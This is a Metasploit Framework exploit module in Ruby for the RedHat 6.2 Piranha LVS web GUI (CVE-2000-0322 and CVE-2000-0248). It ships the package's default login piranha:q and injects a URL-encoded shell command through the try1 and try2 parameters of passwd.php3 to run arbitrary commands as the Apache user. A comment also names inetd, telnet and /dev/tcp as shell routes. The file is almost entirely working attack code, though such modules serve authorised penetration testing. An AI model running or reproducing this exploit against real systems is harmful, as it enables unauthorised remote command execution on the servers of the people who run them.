## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'RedHat Piranha Virtual Server Package passwd.php3 Arbitrary Command Execution', 'Description' => %q{ This module abuses two flaws - a metacharacter injection vulnerability in the HTTP management server of RedHat 6.2 systems running the Piranha LVS cluster service and GUI (rpm packages: piranha and piranha-gui). The vulnerability allows an authenticated attacker to execute arbitrary commands as the Apache user account (nobody) within the /piranha/secure/passwd.php3 script. The package installs with a default user and password of piranha:q which was exploited in the wild. }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2000-0322' ], [ 'CVE', '2000-0248' ], [ 'OSVDB', '1300' ], [ 'OSVDB', '289' ], [ 'BID', '1149' ], [ 'BID', '1148' ], ], 'Platform' => ['unix'], 'Arch' => ARCH_CMD, 'Privileged' => false, 'Payload' => { 'Space' => 1024, 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic', # inetd works, but not on RH6.2 syntax wise. telnet also, but /dev/tcp not found. # others use single quotes which apache/bash/htpasswd escapes (\) and breaks. sigh! } }, 'Targets' => [ [ 'Automatic (piranha-gui-0.4.12-1.i386.rpm)', { }] ], 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(80), OptString.new('BasicAuthUser', [true, 'The HTTP username to specify for basic authentication', 'piranha']), OptString.new('BasicAuthPass', [true, 'The HTTP password to specify for basic authentication', 'q']), ], self.class) end def exploit cmd = Rex::Text.uri_encode(payload.encoded, 'hex-normal') str = "/piranha/secure/passwd.php3?try1=q+;#{cmd}&try2=q+;#{cmd}&passwd=ACCEPT" print_status("Sending GET request with encoded command line...") res = send_request_raw({ 'uri' => str, 'method' => 'GET', 'headers' => { 'content-type' => 'application/x-www-form-urlencoded', }, }, 3) if (res.code == 401) print_error("401 Authorization Required! Our BasicAuthUser and BasicAuthPass credentials not accepted!") elsif (res.code == 200 and res.body =~ /The passwords you supplied match/) print_status("Command successfully executed (according to the server).") end end end